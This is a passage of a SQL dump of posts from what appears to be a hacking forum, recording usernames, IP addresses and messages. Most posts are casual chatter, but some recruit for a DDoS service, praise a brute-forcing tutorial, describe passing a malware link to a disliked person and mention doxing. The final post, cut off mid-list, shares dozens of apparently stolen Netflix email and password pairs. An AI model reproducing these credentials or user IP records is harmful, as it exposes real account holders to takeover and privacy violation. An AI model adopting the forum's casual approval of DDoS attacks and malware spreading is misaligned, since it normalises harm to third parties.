by 12am, (on work days), and wake up at 8am. I\'m still bloody wrecked though. When I don\'t have work, It\'s between 3-4am, and get up after noon.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cdede4fb5c8f5e5c6f7268cfa379e4ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4213', '563', '4160', '25', 'RE: Virus Removal Tools', '0', '205', 'mothered', '1349928356', '[quote=\'NeonLights\' pid=\'4160\' dateline=\'1349887540\'] useless thread... waste of time lmao why did u even spend time doing this? [/quote] So people like you, can comment with Immaturity and childish remarks. By the way, great to see you leave :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '99714f0aa08b908321e0cca0ce1cc9df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4214', '791', '4134', '7', 'RE: Are you a morning person?', '0', '2', 'Apathy', '1349930427', 'Nope I sleep on average about 6 hours(stay up too late) and I feel like shit in the morning.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '199278fee2bc67b476c78c291964c03a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4215', '788', '4196', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349933162', '[quote=\'Timmy\' pid=\'4196\' dateline=\'1349920787\'] Jok3r: Yeah baby Timmy: Yeah sugar Lets make it to 5k posts now. [/quote] We are working on getting it to 5k posts.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '99de24ef5748355b97559dc93e4b9d36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4216', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1349933219', 'Thank god he is banned, he wasnt active anyways.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e2350fbe53455cfc2a4ef94a9a5493d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4217', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '3', '??????????¢™', '1349933339', 'Wow might have been getting ready for another slaughter like that batman one.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'db3605657ec1edd3d0d798e22bd6c9e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4218', '791', '4134', '7', 'RE: Are you a morning person?', '0', '3', '??????????¢™', '1349933392', 'Same here, If I sleep all day as soon as I get home from school I will still be tired and lazy in the morning.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5c1f7e844e19944909bdadfa64b21767', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4219', '792', '4195', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1349945537', '[quote=\'Timmy\' pid=\'4195\' dateline=\'1349920714\'] Brilliant idea and now that this group is invite only this group will succeed. [/quote] thanks for the feedback, please feel free to give any suggestions you might have to add new rules', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', '27cc1ceb34cc9ca337976b9d04ea95cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4220', '779', '4023', '61', 'RE: Get everything for FREE', '0', '62', 'R?????zo?', '1349945607', 'It\'s a great ebook indeed.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', '96f53765672393d5ca063a3c00b0d8c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4221', '776', '4185', '16', 'RE: What are some things you want SE\'d?', '0', '62', 'R?????zo?', '1349945714', '[quote=\'NXK\' pid=\'4185\' dateline=\'1349917955\'] This keyboard so bad aha http://www.razerzone.com/ca-en/store/razer-deathstalker-ultimate I can\'t get it, I\'m always declined -_- [/quote] would love this aswell.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', 'f04682f9b4cf19621b7dec46666e2748', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4222', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '62', 'R?????zo?', '1349945782', 'Nice tutorial, thanks for sharing.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', 'a42ab001e29f6a9b98b2aff9983e7ad6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4223', '805', '0', '47', 'Win 5 likes on your youtube video', '0', '53', 'sirchamp', '1349948717', 'Just chose a number from 1-5 I will use random.org to chose the winner The winner will get 5 likes on his youtube video. Pretty crappy prize I know but its better than nothing. I will decide a winner once all the numbers are filled -Requirements: None 1. 2. 3. 4. 5. Good luck', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c04745ff909c25e9035f4836a07ed142', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4224', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '100', '??zg???g????61', '1349952271', 'Well its not exactly that, think of it as paypal, but without limits.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c5bba9adec6aeff31ad446e599daa452', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4225', '806', '0', '58', '[NEW] (Recruiting) DDoS\'ers - Join today', '0', '100', '??zg???g????61', '1350921780', '[align=center][size=medium][color=#E6E6FA] [color=#DAA520]Hello everybody, GRONgamer here. This is the Official recruitment thread for my new group - DDoS\'ers. I have made this group because I have always had a great interest in networking, and run my own DDoS\'ing service. (Click my signature :P)as long as you meet the small requirements I\'ve listed below.[/color] [color=#FF4500] 1.) Must have at LEAST 30+ posts. 2.) Must have at least 1 or more positive rep. 3.) Must have at least a basic understanding of networking. 4.) Must be able to answer a few simple questions I throw at you.[/color] Please PM me if you would like to join, you don\'t need to fill out an application just PM saying you\'d like to join and I\'ll reply with a few questions or turn you down. [/color][/size][/align] also if you guys could bump this that would be great. :)', '96.237.179.21', '1096865674', '1', '0', '100', '1350939045', '1', '2f1fc5a71b0f93ab6008c6bbe86aa96b', '0', '1350939045'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4226', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '53', 'sirchamp', '1349954251', 'Its not money for video gaming. Its a similar principle. Bitcoins are real money.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'cbd9e271491aac87d957d09c69a178a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4227', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349955578', 'Woah. Nice avatar :o Sexy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50f8be84f18e917f5fb1c6abc667bdde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4228', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349955614', 'But the captcha they have are easy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a67404d5ffe9e5c1d563f7b4674b9123', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4229', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349955648', 'Thanks. :D Welcome to LH .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6cbdc1bc053b00fee0aa84a2b3f65e9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4230', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1349955720', 'My friend got infected. And I almost clicked on the link. But then I just copied it and gave it to someone on Facebook that doesn\'t like me. And I don\'t like him either. So I think he clicked on it not sure.. But I knew it was a Hotfile.com link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f31050e6e7d739022e92c1e62a4e1d5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4231', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349955777', 'The admin closed the thread ^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44e721aaf29b2ae6c49c8a4813c2471f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4232', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349955825', 'Granted but your house burned to the ground + the $1,000,000,000. I wish I was Rainbow Dash <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9abd8dafd179163ba0c42600bf900067', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4233', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349955891', '/me fucking hates t3h jok3r for releasing my dox. You could\'ve allowed TheAnarchist to do it instead. If you did so, we could\'ve still been friends. And my dox would\'ve been released by him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ad46ed11cf9385195d34dd419ecc4f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4234', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349955926', 'Banned for noticing .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '900aa153de2aa2ff42fc87a6f80360eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4235', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349955979', '53. You can count?!!?!?! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9855b368a612cf15b80f7e2c6282b71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4236', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1349956085', 'Gratz LH. Thanks to everyone who posted. Mostly me. Thank you iTzIpod I love you', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '82922a0866f0680d3f5acd9837209b11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4237', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1349956226', 'NL is actually a good member. He contributed a lot of posts and threads to LH. But since he betrayed us.. We can\'t really go back for him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de65050a6a07dea9db7d4cef6bb583e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4238', '807', '0', '34', '[ Get ] Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '17', '228', 'VirtualLegend', '1349957220', '[align=justify][color=#32CD32][size=medium]What\'s Up, Today i have a intrested Graphics Kit for you. It\'s called Ninja Graphics Kit and it cost around 40 dollars. I\'m not all about money so thats why i will give you all guys the Graphics Kit. [/size][/color] [color=#800080][size=large]What is in the Graphics Kit: - Add to the C@RD buttons - Guarantee Badges - OptimizePress Headers - Aristocracy Icon Set - Iphone Mockup Templates - Pricing Tables - Download Buttons - Credit Card Icons - Product cover Graphics - Handdrawn Doodles - Headlines - Logo Templates[/size][/color] [color=#FF0000][size=x-large]AND MUCH MORE !!![/size][/color] [color=#FFD700][size=medium]My opinion is that this will help you alot as a designer.[/size][/color] [u][b][color=#FF1493][size=medium]Download Link:[/size][/color][/b][/u] [quote]http://www.ninjagraphicskit.com/ty0011180dypdy2099.html[/quote] [color=#00BFFF][size=large]If you want to show your appreciation just leave a Nice Comment Below, and I\'m always open for Tips and Questions. [/size][/color][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'ab840039713ec5eb66c744ae198154ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4239', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '205', 'mothered', '1349958049', 'His attitude Is not In the right perspective. When things go wrong, rather than taking responsibility for his own actions, he looks for someone else to blame.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4c2da401e9049436ae8059c8387144bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4240', '782', '4052', '7', 'RE: We need to advertise!', '0', '205', 'mothered', '1349958235', 'I agree, but the problem with advertising In forums, Is that they don\'t allow the advertising of competitive forums In their rules. Facebook and word of mouth, can do quite well.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b4a56b9bb890edacaef99bf439c1e7d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4241', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349959546', 'thanks but was not me who made it :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'c7d35fa2069091199b6e18f2a2962977', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4242', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '62', 'R?????zo?', '1349959582', 'great ebook, I will give logitech a try, really need that keyboard :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '822eb781444f290c7c27480d7fdf4110', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4243', '782', '4052', '7', 'RE: We need to advertise!', '0', '62', 'R?????zo?', '1349959657', 'we have been banned from google so the only thing we can do is refer members.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '305a522e8a77ef5a2b6d260f294a834e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4244', '190', '4203', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349959760', '[quote=\'swa4567\' pid=\'4203\' dateline=\'1349922826\'] http://www.anarchyforums.net/Thread-lets-all-betray-l33tshacking-net-im-neonlights-from-there-forum-time-to-act Copied that when someone told us on Skype that Neon left and joined AF. [/quote] what a jerk.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '2e7fd6fdfb3d3375eea81f5d827d4b48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4245', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349959819', '54. cmon guys we will never reach 200 at this rate!', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'f7a9b0ea33fe761d46e349853aefea95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4246', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '62', 'R?????zo?', '1349960559', 'he was a nice member but what betrayed us, so yeah as Ipod says we can\'t really just forget what he did and accept im back.', '46.50.38.84', '775038548', '1', '0', '62', '1349960572', '1', '329d46a2e57a8e9f65e43242f4fda91a', '0', '1349960572'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4247', '807', '4238', '34', 'RE: Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '62', 'R?????zo?', '1349961887', 'Thanks for sharing this, I will have a look once I get home.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'dcc68acfe5f06724c720edd38d53ae9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4248', '654', '4228', '9', 'RE: Make money typing captchas', '0', '53', 'sirchamp', '1349961929', '[quote=\'iTzIpod\' pid=\'4228\' dateline=\'1349955614\'] But the captcha they have are easy. [/quote] But it takes ages to fill out 1000 captchas. This is a working method but it you need to invest lots of work and time to get any profit.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'bfeef9bb29fb6f908268f8e2c89510b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4249', '654', '3226', '9', 'RE: Make money typing captchas', '0', '62', 'R?????zo?', '1349962493', 'hire 100 chineses guys for every 1000 captchas they enter you pay them 0.50 = profit :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '46d8ea6a9915f5ef7805822c37f14491', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4250', '807', '4247', '34', 'RE: Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '228', 'VirtualLegend', '1349966386', '[quote=\'R?????zo?\' pid=\'4247\' dateline=\'1349961887\'] Thanks for sharing this, I will have a look once I get home. [/quote] No Problem, I\'m Thinking to Give often Ebooks and other stuff for free to the L33thacking Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8dfec9a3c0fb54b50b7f531467697298', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4251', '764', '4036', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '61', 'NXK', '1349967639', '[quote=\'Anonymous™\' pid=\'4036\' dateline=\'1349787707\'] Error (509) This account\'s public links are generating too much traffic and have been temporarily disabled! [/quote] Leechers going to leech. Sadly it happens on pretty much ever hacking forum.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72f671757198a9db1bd398897cfa2d2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4252', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349968435', 'Thanks Reloadzor. Like your name btw, lol.', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'b569cfb0855a0583c4ff9e3f989b6817', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4253', '807', '4238', '34', 'nomage<3', '0', '232', 'BreShiE', '1349969812', 'Downloading right now, I\'m mainly interested in those pricing tables, haha. Thanks a lot OP!', '78.149.62.28', '1318403612', '1', '0', '232', '1349969888', '1', 'b3384517edcff309ee24b10a97f038c0', '0', '1349969888'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4254', '749', '4252', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349969901', '[quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\'] Thanks Reloadzor. Like your name btw, lol. [/quote] may I ask you why is that? :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '58a64939632ade742f9b4497ab971720', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4255', '749', '4254', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349970207', '[quote=\'R?????zo?\' pid=\'4254\' dateline=\'1349969901\'] [quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\'] Thanks Reloadzor. Like your name btw, lol. [/quote] may I ask you why is that? :P [/quote] I\'m not actually sure, I just do for some reason. :D', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'c6c8900d1cdb973a3242bd257cfd9d30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4256', '808', '0', '54', 'Huge list of NETFLIX accounts', '0', '62', 'R?????zo?', '1349970474', 'Not sure which ones work, just have to search through. Once you find one please leave the rest for everyone else to join. [code]david0524y@hotmail.com:monkey35 patriciafleming9@aol.com:prissy derrickmc@aol.com:redskins joev456@comcast.net:34tipoff infj1970@hotmail.com:largent takahashc001@hawaii.rr.com:persol jeremy.jba3737@gmail.com:dw1000 jeeplake@yahoo.ca:yellow howardgordon@optonline.net:lilyan jkevi@aol.com:buddah raffine:balsinno bigdrawers@hotmail.com:Mrsmith3 willy3259@yahoo.com:willy7160 pyroclastic_wall@yahoo.com:phoenix7 j_murrietta@yahoo.com:tofa1968 cflemos@gmail.com:jeba13 alxdgtlgy@aol.com:21danger nova562003@hotmail.com:nova56 suepr3@yahoo.com:291617 blanke84@hotmail.com:yellow55 bentmci@aol.com:103144 Zephyr:Zephyr taylor32:taylor32 bob12:bob12 Alberto:123456 wunderbra:wunderbra teddy:teddy durand:123456 sahil:sahil metoo:metoo ramador:ramador ratus:ratus thorsen:thorsen tommyboy:tommyboy sunshine:sunshine tetris:tetris USER: jeffmalmquist@hotmail.com PASS: jaj32677 USER: jdonald@hawaii.rr.com PASS: hiang50 USER: jbridges11@comcast.net PASS: shadow USER: 987654@hotmail.com PASS: 123456 USER: AMERICAN_53@yahoo.com PASS: smokey USER: Aeronious@yahoo.com PASS: oingo USER: Alan7524@yahoo.com PASS: thetachi USER: Alexoah@hotmail.com PASS: maddux USER: qmeshawn PASS: jetpilot USER: marlboro PASS: marlboro USER: ndbusek@gmail.com PASS: Climb1 USER: rjb612@gmail.com PASS: sockr8 USER: lekis69@yahoo.com PASS: 157408 USER: bobjoe PASS: bobjoe User: ceejay2@hotmail.com Pass: bikestud User: christopher_cedillo@hotmail.com 